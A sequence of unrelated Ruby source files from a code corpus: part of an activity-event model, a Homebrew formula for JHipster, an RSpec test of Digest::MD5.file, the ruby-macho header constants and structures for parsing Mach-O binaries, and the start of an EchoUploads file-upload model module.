target if note?
end
def action_name
if push?
push_action_name
elsif closed?
"closed"
elsif merged?
"accepted"
elsif joined?
'joined'
elsif left?
'left'
elsif expired?
'removed due to membership expiration from'
elsif destroyed?
'destroyed'
elsif commented?
"commented on"
elsif created_project?
created_project_action_name
else
"opened"
end
end
def target_iid
target.respond_to?(:iid) ? target.iid : target_id
end
def commit_note?
note? && target && target.for_commit?
end
def issue_note?
note? && target && target.for_issue?
end
def merge_request_note?
note? && target && target.for_merge_request?
end
def project_snippet_note?
note? && target && target.for_snippet?
end
def personal_snippet_note?
note? && target && target.for_personal_snippet?
end
def note_target
target.noteable
end
def note_target_id
if commit_note?
target.commit_id
else
target.noteable_id.to_s
end
end
def note_target_reference
return unless note_target
# Commit#to_reference returns the full SHA, but we want the short one here
if commit_note?
note_target.short_id
else
note_target.to_reference
end
end
def note_target_type
if target.noteable_type.present?
target.noteable_type.titleize
else
"Wall"
end.downcase
end
def body?
if push?
push_with_commits?
elsif note?
true
else
target.respond_to? :title
end
end
def reset_project_activity
return unless project
# Don't bother updating if we know the project was updated recently.
return if recent_update?
# At this point it's possible for multiple threads/processes to try to
# update the project. Only one query should actually perform the update,
# hence we add the extra WHERE clause for last_activity_at.
Project.unscoped.where(id: project_id)
.where('last_activity_at <= ?', RESET_PROJECT_ACTIVITY_INTERVAL.ago)
.update_all(last_activity_at: created_at)
end
def authored_by?(user)
user ? author_id == user.id : false
end
def to_partial_path
# We are intentionally using `Event` rather than `self.class` so that
# subclasses also use the `Event` implementation.
Event._to_partial_path
end
private
def push_action_name
if new_ref?
"pushed new"
elsif rm_ref?
"deleted"
else
"pushed to"
end
end
def created_project_action_name
if project.external_import?
"imported"
else
"created"
end
end
def recent_update?
project.last_activity_at > RESET_PROJECT_ACTIVITY_INTERVAL.ago
end
def set_last_repository_updated_at
Project.unscoped.where(id: project_id)
.where("last_repository_updated_at < ? OR last_repository_updated_at IS NULL", REPOSITORY_UPDATED_AT_INTERVAL.ago)
.update_all(last_repository_updated_at: created_at)
end
def track_user_interacted_projects
# Note the call to .available? is due to earlier migrations
# that would otherwise conflict with the call to .track
# (because the table does not exist yet).
UserInteractedProject.track(self) if UserInteractedProject.available?
end
end
| 23.004878 | 120 | 0.673346 |
e838aefc5429de1848bdcdff6967c5d5f0189ece
| 1,229 |
require "language/node"
class Jhipster < Formula
desc "Generate, develop and deploy Spring Boot + Angular/React applications"
homepage "https://www.jhipster.tech/"
url "https://registry.npmjs.org/generator-jhipster/-/generator-jhipster-7.0.0.tgz"
sha256 "cbb84ce61223bdb92e11e36b9c48525830f9e29f570377f57f4501ee3f7da304"
license "Apache-2.0"
bottle do
sha256 cellar: :any_skip_relocation, arm64_big_sur: "edf9a4827d0ba3e318dcdbe37e691d1dae0f9a83d74ee2aae58184934b6ce2e8"
sha256 cellar: :any_skip_relocation, big_sur: "383a62d2521975cde135e326f678ea3b636271bdad39f6b36c53e261d5e413ad"
sha256 cellar: :any_skip_relocation, catalina: "d18017c4fb21fc3076b0360372f9ff8e14260399f00caddd948ef3220fa77f78"
sha256 cellar: :any_skip_relocation, mojave: "a5f8fcb7dfd53f388d8866976fb296a4772bd8d6ef5b751bc9344fe75e73c189"
end
depends_on "node"
depends_on "openjdk"
def install
system "npm", "install", *Language::Node.std_npm_install_args(libexec)
bin.install Dir["#{libexec}/bin/*"]
bin.env_script_all_files libexec/"bin", Language::Java.overridable_java_home_env
end
test do
assert_match "execution is complete", shell_output("#{bin}/jhipster info")
end
end
| 40.966667 | 122 | 0.785191 |
2684f50373b714261f697c4c8dff51f657b49814
| 1,276 |
require_relative '../../../spec_helper'
require_relative 'shared/constants'
require_relative '../../../core/file/shared/read'
describe "Digest::MD5.file" do
describe "when passed a path to a file that exists" do
before :each do
@file = tmp("md5_temp")
touch(@file, 'wb') {|f| f.write MD5Constants::Contents }
end
after :each do
rm_r @file
end
it "returns a Digest::MD5 object" do
Digest::MD5.file(@file).should be_kind_of(Digest::MD5)
end
it "returns a Digest::MD5 object with the correct digest" do
Digest::MD5.file(@file).digest.should == MD5Constants::Digest
end
it "calls #to_str on an object and returns the Digest::MD5 with the result" do
obj = mock("to_str")
obj.should_receive(:to_str).and_return(@file)
result = Digest::MD5.file(obj)
result.should be_kind_of(Digest::MD5)
result.digest.should == MD5Constants::Digest
end
end
it_behaves_like :file_read_directory, :file, Digest::MD5
it "raises a Errno::ENOENT when passed a path that does not exist" do
lambda { Digest::MD5.file("") }.should raise_error(Errno::ENOENT)
end
it "raises a TypeError when passed nil" do
lambda { Digest::MD5.file(nil) }.should raise_error(TypeError)
end
end
| 29 | 82 | 0.672414 |
1af5822abf67e9673563d1bc74ec737b46c66d2c
| 21,794 |
module MachO
# Classes and constants for parsing the headers of Mach-O binaries.
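#
# @example Translating raw CPU fields into symbols (illustrative sketch; the
#   values come straight from the constants defined below, not from a parsed
#   binary)
#   MachO::Headers::CPU_TYPES[MachO::Headers::CPU_TYPE_X86_64]
#   # => :x86_64
#   MachO::Headers::CPU_SUBTYPES[MachO::Headers::CPU_TYPE_X86_64][MachO::Headers::CPU_SUBTYPE_X86_64_ALL]
#   # => :x86_64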
module Headers
# big-endian fat magic
# @api private
FAT_MAGIC = 0xcafebabe
# little-endian fat magic
# @note This is defined for completeness, but should never appear in ruby-macho code,
# since fat headers are always big-endian.
# @api private
FAT_CIGAM = 0xbebafeca
# 64-bit big-endian fat magic
FAT_MAGIC_64 = 0xcafebabf
# 64-bit little-endian fat magic
# @note This is defined for completeness, but should never appear in ruby-macho code,
# since fat headers are always big-endian.
FAT_CIGAM_64 = 0xbfbafeca
# 32-bit big-endian magic
# @api private
MH_MAGIC = 0xfeedface
# 32-bit little-endian magic
# @api private
MH_CIGAM = 0xcefaedfe
# 64-bit big-endian magic
# @api private
MH_MAGIC_64 = 0xfeedfacf
# 64-bit little-endian magic
# @api private
MH_CIGAM_64 = 0xcffaedfe
# association of magic numbers to string representations
# @api private
MH_MAGICS = {
FAT_MAGIC => "FAT_MAGIC",
FAT_MAGIC_64 => "FAT_MAGIC_64",
MH_MAGIC => "MH_MAGIC",
MH_CIGAM => "MH_CIGAM",
MH_MAGIC_64 => "MH_MAGIC_64",
MH_CIGAM_64 => "MH_CIGAM_64",
}.freeze
# mask for CPUs with 64-bit architectures (when running a 64-bit ABI?)
# @api private
CPU_ARCH_ABI64 = 0x01000000
# mask for CPUs with 64-bit architectures (when running a 32-bit ABI?)
# @see https://github.com/Homebrew/ruby-macho/issues/113
# @api private
CPU_ARCH_ABI32 = 0x02000000
# any CPU (unused?)
# @api private
CPU_TYPE_ANY = -1
# m68k compatible CPUs
# @api private
CPU_TYPE_MC680X0 = 0x06
# i386 and later compatible CPUs
# @api private
CPU_TYPE_I386 = 0x07
# x86_64 (AMD64) compatible CPUs
# @api private
CPU_TYPE_X86_64 = (CPU_TYPE_I386 | CPU_ARCH_ABI64)
# 32-bit ARM compatible CPUs
# @api private
CPU_TYPE_ARM = 0x0c
# m88k compatible CPUs
# @api private
CPU_TYPE_MC88000 = 0xd
# 64-bit ARM compatible CPUs
# @api private
CPU_TYPE_ARM64 = (CPU_TYPE_ARM | CPU_ARCH_ABI64)
# 64-bit ARM compatible CPUs (running in 32-bit mode?)
# @see https://github.com/Homebrew/ruby-macho/issues/113
CPU_TYPE_ARM64_32 = (CPU_TYPE_ARM | CPU_ARCH_ABI32)
# PowerPC compatible CPUs
# @api private
CPU_TYPE_POWERPC = 0x12
# PowerPC64 compatible CPUs
# @api private
CPU_TYPE_POWERPC64 = (CPU_TYPE_POWERPC | CPU_ARCH_ABI64)
# association of cpu types to symbol representations
# @api private
CPU_TYPES = {
CPU_TYPE_ANY => :any,
CPU_TYPE_I386 => :i386,
CPU_TYPE_X86_64 => :x86_64,
CPU_TYPE_ARM => :arm,
CPU_TYPE_ARM64 => :arm64,
CPU_TYPE_ARM64_32 => :arm64_32,
CPU_TYPE_POWERPC => :ppc,
CPU_TYPE_POWERPC64 => :ppc64,
}.freeze
# mask for CPU subtype capabilities
# @api private
CPU_SUBTYPE_MASK = 0xff000000
# 64-bit libraries (undocumented!)
# @see http://llvm.org/docs/doxygen/html/Support_2MachO_8h_source.html
# @api private
CPU_SUBTYPE_LIB64 = 0x80000000
# the lowest common sub-type for `CPU_TYPE_I386`
# @api private
CPU_SUBTYPE_I386 = 3
# the i486 sub-type for `CPU_TYPE_I386`
# @api private
CPU_SUBTYPE_486 = 4
# the i486SX sub-type for `CPU_TYPE_I386`
# @api private
CPU_SUBTYPE_486SX = 132
# the i586 (P5, Pentium) sub-type for `CPU_TYPE_I386`
# @api private
CPU_SUBTYPE_586 = 5
# @see CPU_SUBTYPE_586
# @api private
CPU_SUBTYPE_PENT = CPU_SUBTYPE_586
# the Pentium Pro (P6) sub-type for `CPU_TYPE_I386`
# @api private
CPU_SUBTYPE_PENTPRO = 22
# the Pentium II (P6, M3?) sub-type for `CPU_TYPE_I386`
# @api private
CPU_SUBTYPE_PENTII_M3 = 54
# the Pentium II (P6, M5?) sub-type for `CPU_TYPE_I386`
# @api private
CPU_SUBTYPE_PENTII_M5 = 86
# the Pentium 4 (Netburst) sub-type for `CPU_TYPE_I386`
# @api private
CPU_SUBTYPE_PENTIUM_4 = 10
# the lowest common sub-type for `CPU_TYPE_MC680X0`
# @api private
CPU_SUBTYPE_MC680X0_ALL = 1
# @see CPU_SUBTYPE_MC680X0_ALL
# @api private
CPU_SUBTYPE_MC68030 = CPU_SUBTYPE_MC680X0_ALL
# the 040 subtype for `CPU_TYPE_MC680X0`
# @api private
CPU_SUBTYPE_MC68040 = 2
# the 030 subtype for `CPU_TYPE_MC680X0`
# @api private
CPU_SUBTYPE_MC68030_ONLY = 3
# the lowest common sub-type for `CPU_TYPE_X86_64`
# @api private
CPU_SUBTYPE_X86_64_ALL = CPU_SUBTYPE_I386
# the Haswell sub-type for `CPU_TYPE_X86_64`
# @api private
CPU_SUBTYPE_X86_64_H = 8
# the lowest common sub-type for `CPU_TYPE_ARM`
# @api private
CPU_SUBTYPE_ARM_ALL = 0
# the v4t sub-type for `CPU_TYPE_ARM`
# @api private
CPU_SUBTYPE_ARM_V4T = 5
# the v6 sub-type for `CPU_TYPE_ARM`
# @api private
CPU_SUBTYPE_ARM_V6 = 6
# the v5 sub-type for `CPU_TYPE_ARM`
# @api private
CPU_SUBTYPE_ARM_V5TEJ = 7
# the xscale (v5 family) sub-type for `CPU_TYPE_ARM`
# @api private
CPU_SUBTYPE_ARM_XSCALE = 8
# the v7 sub-type for `CPU_TYPE_ARM`
# @api private
CPU_SUBTYPE_ARM_V7 = 9
# the v7f (Cortex A9) sub-type for `CPU_TYPE_ARM`
# @api private
CPU_SUBTYPE_ARM_V7F = 10
# the v7s ("Swift") sub-type for `CPU_TYPE_ARM`
# @api private
CPU_SUBTYPE_ARM_V7S = 11
# the v7k ("Kirkwood40") sub-type for `CPU_TYPE_ARM`
# @api private
CPU_SUBTYPE_ARM_V7K = 12
# the v6m sub-type for `CPU_TYPE_ARM`
# @api private
CPU_SUBTYPE_ARM_V6M = 14
# the v7m sub-type for `CPU_TYPE_ARM`
# @api private
CPU_SUBTYPE_ARM_V7M = 15
# the v7em sub-type for `CPU_TYPE_ARM`
# @api private
CPU_SUBTYPE_ARM_V7EM = 16
# the v8 sub-type for `CPU_TYPE_ARM`
# @api private
CPU_SUBTYPE_ARM_V8 = 13
# the lowest common sub-type for `CPU_TYPE_ARM64`
# @api private
CPU_SUBTYPE_ARM64_ALL = 0
# the v8 sub-type for `CPU_TYPE_ARM64`
# @api private
CPU_SUBTYPE_ARM64_V8 = 1
# the v8 sub-type for `CPU_TYPE_ARM64_32`
# @api private
CPU_SUBTYPE_ARM64_32_V8 = 1
# the lowest common sub-type for `CPU_TYPE_MC88000`
# @api private
CPU_SUBTYPE_MC88000_ALL = 0
# @see CPU_SUBTYPE_MC88000_ALL
# @api private
CPU_SUBTYPE_MMAX_JPC = CPU_SUBTYPE_MC88000_ALL
# the 100 sub-type for `CPU_TYPE_MC88000`
# @api private
CPU_SUBTYPE_MC88100 = 1
# the 110 sub-type for `CPU_TYPE_MC88000`
# @api private
CPU_SUBTYPE_MC88110 = 2
# the lowest common sub-type for `CPU_TYPE_POWERPC`
# @api private
CPU_SUBTYPE_POWERPC_ALL = 0
# the 601 sub-type for `CPU_TYPE_POWERPC`
# @api private
CPU_SUBTYPE_POWERPC_601 = 1
# the 602 sub-type for `CPU_TYPE_POWERPC`
# @api private
CPU_SUBTYPE_POWERPC_602 = 2
# the 603 sub-type for `CPU_TYPE_POWERPC`
# @api private
CPU_SUBTYPE_POWERPC_603 = 3
# the 603e (G2) sub-type for `CPU_TYPE_POWERPC`
# @api private
CPU_SUBTYPE_POWERPC_603E = 4
# the 603ev sub-type for `CPU_TYPE_POWERPC`
# @api private
CPU_SUBTYPE_POWERPC_603EV = 5
# the 604 sub-type for `CPU_TYPE_POWERPC`
# @api private
CPU_SUBTYPE_POWERPC_604 = 6
# the 604e sub-type for `CPU_TYPE_POWERPC`
# @api private
CPU_SUBTYPE_POWERPC_604E = 7
# the 620 sub-type for `CPU_TYPE_POWERPC`
# @api private
CPU_SUBTYPE_POWERPC_620 = 8
# the 750 (G3) sub-type for `CPU_TYPE_POWERPC`
# @api private
CPU_SUBTYPE_POWERPC_750 = 9
# the 7400 (G4) sub-type for `CPU_TYPE_POWERPC`
# @api private
CPU_SUBTYPE_POWERPC_7400 = 10
# the 7450 (G4 "Voyager") sub-type for `CPU_TYPE_POWERPC`
# @api private
CPU_SUBTYPE_POWERPC_7450 = 11
# the 970 (G5) sub-type for `CPU_TYPE_POWERPC`
# @api private
CPU_SUBTYPE_POWERPC_970 = 100
# any CPU sub-type for CPU type `CPU_TYPE_POWERPC64`
# @api private
CPU_SUBTYPE_POWERPC64_ALL = CPU_SUBTYPE_POWERPC_ALL
# association of CPU types/subtype pairs to symbol representations in
# (very) roughly descending order of commonness
# @see https://opensource.apple.com/source/cctools/cctools-877.8/libstuff/arch.c
# @api private
CPU_SUBTYPES = {
CPU_TYPE_I386 => {
CPU_SUBTYPE_I386 => :i386,
CPU_SUBTYPE_486 => :i486,
CPU_SUBTYPE_486SX => :i486SX,
CPU_SUBTYPE_586 => :i586, # also "pentium" in arch(3)
CPU_SUBTYPE_PENTPRO => :i686, # also "pentpro" in arch(3)
CPU_SUBTYPE_PENTII_M3 => :pentIIm3,
CPU_SUBTYPE_PENTII_M5 => :pentIIm5,
CPU_SUBTYPE_PENTIUM_4 => :pentium4,
}.freeze,
CPU_TYPE_X86_64 => {
CPU_SUBTYPE_X86_64_ALL => :x86_64,
CPU_SUBTYPE_X86_64_H => :x86_64h,
}.freeze,
CPU_TYPE_ARM => {
CPU_SUBTYPE_ARM_ALL => :arm,
CPU_SUBTYPE_ARM_V4T => :armv4t,
CPU_SUBTYPE_ARM_V6 => :armv6,
CPU_SUBTYPE_ARM_V5TEJ => :armv5,
CPU_SUBTYPE_ARM_XSCALE => :xscale,
CPU_SUBTYPE_ARM_V7 => :armv7,
CPU_SUBTYPE_ARM_V7F => :armv7f,
CPU_SUBTYPE_ARM_V7S => :armv7s,
CPU_SUBTYPE_ARM_V7K => :armv7k,
CPU_SUBTYPE_ARM_V6M => :armv6m,
CPU_SUBTYPE_ARM_V7M => :armv7m,
CPU_SUBTYPE_ARM_V7EM => :armv7em,
CPU_SUBTYPE_ARM_V8 => :armv8,
}.freeze,
CPU_TYPE_ARM64 => {
CPU_SUBTYPE_ARM64_ALL => :arm64,
CPU_SUBTYPE_ARM64_V8 => :arm64v8,
}.freeze,
CPU_TYPE_ARM64_32 => {
CPU_SUBTYPE_ARM64_32_V8 => :arm64_32v8,
}.freeze,
CPU_TYPE_POWERPC => {
CPU_SUBTYPE_POWERPC_ALL => :ppc,
CPU_SUBTYPE_POWERPC_601 => :ppc601,
CPU_SUBTYPE_POWERPC_603 => :ppc603,
CPU_SUBTYPE_POWERPC_603E => :ppc603e,
CPU_SUBTYPE_POWERPC_603EV => :ppc603ev,
CPU_SUBTYPE_POWERPC_604 => :ppc604,
CPU_SUBTYPE_POWERPC_604E => :ppc604e,
CPU_SUBTYPE_POWERPC_750 => :ppc750,
CPU_SUBTYPE_POWERPC_7400 => :ppc7400,
CPU_SUBTYPE_POWERPC_7450 => :ppc7450,
CPU_SUBTYPE_POWERPC_970 => :ppc970,
}.freeze,
CPU_TYPE_POWERPC64 => {
CPU_SUBTYPE_POWERPC64_ALL => :ppc64,
# apparently the only exception to the naming scheme
CPU_SUBTYPE_POWERPC_970 => :ppc970_64,
}.freeze,
CPU_TYPE_MC680X0 => {
CPU_SUBTYPE_MC680X0_ALL => :m68k,
CPU_SUBTYPE_MC68030 => :mc68030,
CPU_SUBTYPE_MC68040 => :mc68040,
},
CPU_TYPE_MC88000 => {
CPU_SUBTYPE_MC88000_ALL => :m88k,
},
}.freeze
# relocatable object file
# @api private
MH_OBJECT = 0x1
# demand paged executable file
# @api private
MH_EXECUTE = 0x2
# fixed VM shared library file
# @api private
MH_FVMLIB = 0x3
# core dump file
# @api private
MH_CORE = 0x4
# preloaded executable file
# @api private
MH_PRELOAD = 0x5
# dynamically bound shared library
# @api private
MH_DYLIB = 0x6
# dynamic link editor
# @api private
MH_DYLINKER = 0x7
# dynamically bound bundle file
# @api private
MH_BUNDLE = 0x8
# shared library stub for static linking only, no section contents
# @api private
MH_DYLIB_STUB = 0x9
# companion file with only debug sections
# @api private
MH_DSYM = 0xa
# x86_64 kexts
# @api private
MH_KEXT_BUNDLE = 0xb
# association of filetypes to Symbol representations
# @api private
MH_FILETYPES = {
MH_OBJECT => :object,
MH_EXECUTE => :execute,
MH_FVMLIB => :fvmlib,
MH_CORE => :core,
MH_PRELOAD => :preload,
MH_DYLIB => :dylib,
MH_DYLINKER => :dylinker,
MH_BUNDLE => :bundle,
MH_DYLIB_STUB => :dylib_stub,
MH_DSYM => :dsym,
MH_KEXT_BUNDLE => :kext_bundle,
}.freeze
# association of mach header flag symbols to values
# @api private
MH_FLAGS = {
:MH_NOUNDEFS => 0x1,
:MH_INCRLINK => 0x2,
:MH_DYLDLINK => 0x4,
:MH_BINDATLOAD => 0x8,
:MH_PREBOUND => 0x10,
:MH_SPLIT_SEGS => 0x20,
:MH_LAZY_INIT => 0x40,
:MH_TWOLEVEL => 0x80,
:MH_FORCE_FLAT => 0x100,
:MH_NOMULTIDEFS => 0x200,
:MH_NOPREFIXBINDING => 0x400,
:MH_PREBINDABLE => 0x800,
:MH_ALLMODSBOUND => 0x1000,
:MH_SUBSECTIONS_VIA_SYMBOLS => 0x2000,
:MH_CANONICAL => 0x4000,
:MH_WEAK_DEFINES => 0x8000,
:MH_BINDS_TO_WEAK => 0x10000,
:MH_ALLOW_STACK_EXECUTION => 0x20000,
:MH_ROOT_SAFE => 0x40000,
:MH_SETUID_SAFE => 0x80000,
:MH_NO_REEXPORTED_DYLIBS => 0x100000,
:MH_PIE => 0x200000,
:MH_DEAD_STRIPPABLE_DYLIB => 0x400000,
:MH_HAS_TLV_DESCRIPTORS => 0x800000,
:MH_NO_HEAP_EXECUTION => 0x1000000,
:MH_APP_EXTENSION_SAFE => 0x02000000,
}.freeze
# Fat binary header structure
# @see MachO::FatArch
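# @example Serializing a minimal fat header (illustrative only; a two-arch
#   32-bit header built from the constants above)
#   MachO::Headers::FatHeader.new(MachO::Headers::FAT_MAGIC, 2).serialize.unpack("N2")
#   # => [3405691582, 2]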
class FatHeader < MachOStructure
# @return [Integer] the magic number of the header (and file)
attr_reader :magic
# @return [Integer] the number of fat architecture structures following the header
attr_reader :nfat_arch
# always big-endian
# @see MachOStructure::FORMAT
# @api private
FORMAT = "N2".freeze
# @see MachOStructure::SIZEOF
# @api private
SIZEOF = 8
# @api private
def initialize(magic, nfat_arch)
@magic = magic
@nfat_arch = nfat_arch
end
# @return [String] the serialized fields of the fat header
def serialize
[magic, nfat_arch].pack(FORMAT)
end
# @return [Hash] a hash representation of this {FatHeader}
def to_h
{
"magic" => magic,
"magic_sym" => MH_MAGICS[magic],
"nfat_arch" => nfat_arch,
}.merge super
end
end
# 32-bit fat binary header architecture structure. A 32-bit fat Mach-O has one or more of
# these, indicating one or more internal Mach-O blobs.
# @note "32-bit" indicates the fact that this structure stores 32-bit offsets, not that the
# Mach-Os that it points to necessarily *are* 32-bit.
# @see MachO::Headers::FatHeader
class FatArch < MachOStructure
# @return [Integer] the CPU type of the Mach-O
attr_reader :cputype
# @return [Integer] the CPU subtype of the Mach-O
attr_reader :cpusubtype
# @return [Integer] the file offset to the beginning of the Mach-O data
attr_reader :offset
# @return [Integer] the size, in bytes, of the Mach-O data
attr_reader :size
# @return [Integer] the alignment, as a power of 2
attr_reader :align
# @note Always big endian.
# @see MachOStructure::FORMAT
# @api private
FORMAT = "L>5".freeze
# @see MachOStructure::SIZEOF
# @api private
SIZEOF = 20
# @api private
def initialize(cputype, cpusubtype, offset, size, align)
@cputype = cputype
@cpusubtype = cpusubtype & ~CPU_SUBTYPE_MASK
@offset = offset
@size = size
@align = align
end
# @return [String] the serialized fields of the fat arch
def serialize
[cputype, cpusubtype, offset, size, align].pack(FORMAT)
end
# @return [Hash] a hash representation of this {FatArch}
def to_h
{
"cputype" => cputype,
"cputype_sym" => CPU_TYPES[cputype],
"cpusubtype" => cpusubtype,
"cpusubtype_sym" => CPU_SUBTYPES[cputype][cpusubtype],
"offset" => offset,
"size" => size,
"align" => align,
}.merge super
end
end
# 64-bit fat binary header architecture structure. A 64-bit fat Mach-O has one or more of
# these, indicating one or more internal Mach-O blobs.
# @note "64-bit" indicates the fact that this structure stores 64-bit offsets, not that the
# Mach-Os that it points to necessarily *are* 64-bit.
# @see MachO::Headers::FatHeader
class FatArch64 < FatArch
# @return [void]
attr_reader :reserved
# @note Always big endian.
# @see MachOStructure::FORMAT
# @api private
FORMAT = "L>2Q>2L>2".freeze
# @see MachOStructure::SIZEOF
# @api private
SIZEOF = 32
# @api private
def initialize(cputype, cpusubtype, offset, size, align, reserved = 0)
super(cputype, cpusubtype, offset, size, align)
@reserved = reserved
end
# @return [String] the serialized fields of the fat arch
def serialize
[cputype, cpusubtype, offset, size, align, reserved].pack(FORMAT)
end
# @return [Hash] a hash representation of this {FatArch64}
def to_h
{
"reserved" => reserved,
}.merge super
end
end
# 32-bit Mach-O file header structure
class MachHeader < MachOStructure
# @return [Integer] the magic number
attr_reader :magic
# @return [Integer] the CPU type of the Mach-O
attr_reader :cputype
# @return [Integer] the CPU subtype of the Mach-O
attr_reader :cpusubtype
# @return [Integer] the file type of the Mach-O
attr_reader :filetype
# @return [Integer] the number of load commands in the Mach-O
attr_reader :ncmds
# @return [Integer] the size of all load commands, in bytes, in the Mach-O
attr_reader :sizeofcmds
# @return [Integer] the header flags associated with the Mach-O
attr_reader :flags
# @see MachOStructure::FORMAT
# @api private
FORMAT = "L=7".freeze
# @see MachOStructure::SIZEOF
# @api private
SIZEOF = 28
# @api private
def initialize(magic, cputype, cpusubtype, filetype, ncmds, sizeofcmds,
flags)
@magic = magic
@cputype = cputype
# For now we're not interested in additional capability bits also to be
# found in the `cpusubtype` field. We only care about the CPU sub-type.
@cpusubtype = cpusubtype & ~CPU_SUBTYPE_MASK
@filetype = filetype
@ncmds = ncmds
@sizeofcmds = sizeofcmds
@flags = flags
end
# @example
# puts "this mach-o has position-independent execution" if header.flag?(:MH_PIE)
# @param flag [Symbol] a mach header flag symbol
# @return [Boolean] true if `flag` is present in the header's flag section
def flag?(flag)
flag = MH_FLAGS[flag]
return false if flag.nil?
flags & flag == flag
end
# @return [Boolean] whether or not the file is of type `MH_OBJECT`
def object?
filetype == Headers::MH_OBJECT
end
# @return [Boolean] whether or not the file is of type `MH_EXECUTE`
def executable?
filetype == Headers::MH_EXECUTE
end
# @return [Boolean] whether or not the file is of type `MH_FVMLIB`
def fvmlib?
filetype == Headers::MH_FVMLIB
end
# @return [Boolean] whether or not the file is of type `MH_CORE`
def core?
filetype == Headers::MH_CORE
end
# @return [Boolean] whether or not the file is of type `MH_PRELOAD`
def preload?
filetype == Headers::MH_PRELOAD
end
# @return [Boolean] whether or not the file is of type `MH_DYLIB`
def dylib?
filetype == Headers::MH_DYLIB
end
# @return [Boolean] whether or not the file is of type `MH_DYLINKER`
def dylinker?
filetype == Headers::MH_DYLINKER
end
# @return [Boolean] whether or not the file is of type `MH_BUNDLE`
def bundle?
filetype == Headers::MH_BUNDLE
end
# @return [Boolean] whether or not the file is of type `MH_DSYM`
def dsym?
filetype == Headers::MH_DSYM
end
# @return [Boolean] whether or not the file is of type `MH_KEXT_BUNDLE`
def kext?
filetype == Headers::MH_KEXT_BUNDLE
end
# @return [Boolean] true if the Mach-O has 32-bit magic, false otherwise
def magic32?
Utils.magic32?(magic)
end
# @return [Boolean] true if the Mach-O has 64-bit magic, false otherwise
def magic64?
Utils.magic64?(magic)
end
# @return [Integer] the file's internal alignment
def alignment
magic32? ? 4 : 8
end
# @return [Hash] a hash representation of this {MachHeader}
def to_h
{
"magic" => magic,
"magic_sym" => MH_MAGICS[magic],
"cputype" => cputype,
"cputype_sym" => CPU_TYPES[cputype],
"cpusubtype" => cpusubtype,
"cpusubtype_sym" => CPU_SUBTYPES[cputype][cpusubtype],
"filetype" => filetype,
"filetype_sym" => MH_FILETYPES[filetype],
"ncmds" => ncmds,
"sizeofcmds" => sizeofcmds,
"flags" => flags,
"alignment" => alignment,
}.merge super
end
end
# 64-bit Mach-O file header structure
class MachHeader64 < MachHeader
# @return [void]
attr_reader :reserved
# @see MachOStructure::FORMAT
# @api private
FORMAT = "L=8".freeze
# @see MachOStructure::SIZEOF
# @api private
SIZEOF = 32
# @api private
def initialize(magic, cputype, cpusubtype, filetype, ncmds, sizeofcmds,
flags, reserved)
super(magic, cputype, cpusubtype, filetype, ncmds, sizeofcmds, flags)
@reserved = reserved
end
# @return [Hash] a hash representation of this {MachHeader64}
def to_h
{
"reserved" => reserved,
}.merge super
end
end
end
end
| 27.941026 | 95 | 0.629577 |
4a88832704ff903e9caefc6058e0aa483dc156eb
| 187 |
require 'rails_helper'
describe Product do
it { should validate_presence_of :name }
it { should validate_presence_of :cost }
it { should validate_presence_of :country_origin }
end
| 23.375 | 52 | 0.775401 |
11384a938a9692175c255e6eb2ff3fbf46c63c14
| 11,297 |
require 'base64'
require 'json'
require 'fileutils'
require 'securerandom'
module EchoUploads
module Model
extend ActiveSupport::Concern
included do
class_attribute :echo_uploads_config
include ::EchoUploads::Validation
include ::EchoUploads::PrmFileWriting
include ::EchoUploads::TmpFileWriting
end
def echo_uploads_data
Base64.encode64(JSON.dump(self.class.echo_uploads_config.inject({}) do |hash, (attr, cfg)|
metas = send("#{attr}_tmp_metadata")
if metas
hash[attr] = metas.map do |meta|
{'id' => meta.id, 'key' => meta.key}
end
end
hash
end)).strip
end
# Pass in a hash that's been encoded as JSON and then Base64.
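# Typically this round-trips the value produced by #echo_uploads_data through
# a hidden form field, e.g. (illustrative only; the parameter names are
# assumptions):
#
#   record.echo_uploads_data = params[:widget][:echo_uploads_data]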
def echo_uploads_data=(data)
parsed = JSON.parse Base64.decode64(data)
# parsed will look like:
# { 'attr1' => [ {'id' => 1, 'key' => 'abc...'} ] }
unless parsed.is_a? Hash
raise ArgumentError, "Invalid JSON structure in: #{parsed.inspect}"
end
parsed.each do |attr, attr_data|
# If the :map option was passed, there may be multiple variants of the uploaded
# file. Even if not, attr_data is still a one-element array.
unless attr_data.is_a? Array
raise ArgumentError, "Invalid JSON structure in: #{parsed.inspect}"
end
attr_data.each do |variant_data|
unless variant_data.is_a? Hash
raise ArgumentError, "Invalid JSON structure in: #{parsed.inspect}"
end
if meta = ::EchoUploads::File.where(
id: variant_data['id'], key: variant_data['key'], temporary: true
).first
if send("#{attr}_tmp_metadata").nil?
send "#{attr}_tmp_metadata=", []
end
send("#{attr}_tmp_metadata") << meta
end
end
end
end
# Helper method used internally by Echo Uploads.
def echo_uploads_map_metadata(attr, options)
meta = send("#{attr}_metadata")
meta ? yield(meta) : nil
end
module ClassMethods
# Options:
#
# - +key+: A Proc that takes an ActionDispatch::UploadedFile and returns a key
# uniquely identifying the file. If this option is not specified, the key is
# computed as the SHA-512 hash of the file contents. A digest of the file's
# contents should always be at least a part of the key.
#
# - +expires+: Length of time temporary files will be persisted. Defaults to
# +1.day+.
#
# - +storage+: A class that persists uploaded files to disk, to the cloud, or to
# wherever else you want. Defaults to +Rails.configuration.echo_uploads.storage+,
# which in turn is +EchoUploads::FilesystemStore+ by default.
#
# - +map+: A Proc that accepts an ActionDispatch::Http::UploadedFile and an
# instance of +EchoUploads::Mapper+. It should transform the file data (e.g.
# scaling an image). It should then write the transformed data to one or more
# temporary files. To get the temporary file path(s), call +#write+ on the
# +Mapper+. See readme.md for an example. The +:map+ option can also accept a
# symbol naming an instance method that works the same way as the previously
# described Proc.
#
# - +multiple+: You use the +:map+ option to write multiple versions of the file.
# E.g. multiple thumbnail sizes. If you do so, you must pass +multiple: true+.
# This will make the association with +EchoUploads::File+ a +has_many+ instead of
# a +has_one+. The first file you write in the map function becomes the default.
# E.g.: Your model is called +Widget+, and the upload file attribute is called
# +photo+. You pass +:map+ with a method that writes three files. If you call
# +Widget#photo_path+, it will return the path to the first of the three files.
#
# - +write_tmp_file+: Normally, on a failed attempt to save the record, Echo Uploads
# writes a temp file. That way, the user can fix the validation errors without
# re-uploading the file. This option determines when the temp file is written. The
# default is +:after_rollback+, meaning the temp file is written on a failed
# attempt to save the record. Set to +false+ to turn off temp file saving. You can
# then save temp files manually by calling the generated
# +maybe_write_tmp_<attr>+ method. Set to +:after_validation+ and the temp
# file will be written on validation failure. (Warning: Although ActiveRecord
# implicitly validates before saving, it does so during a transaction. So setting
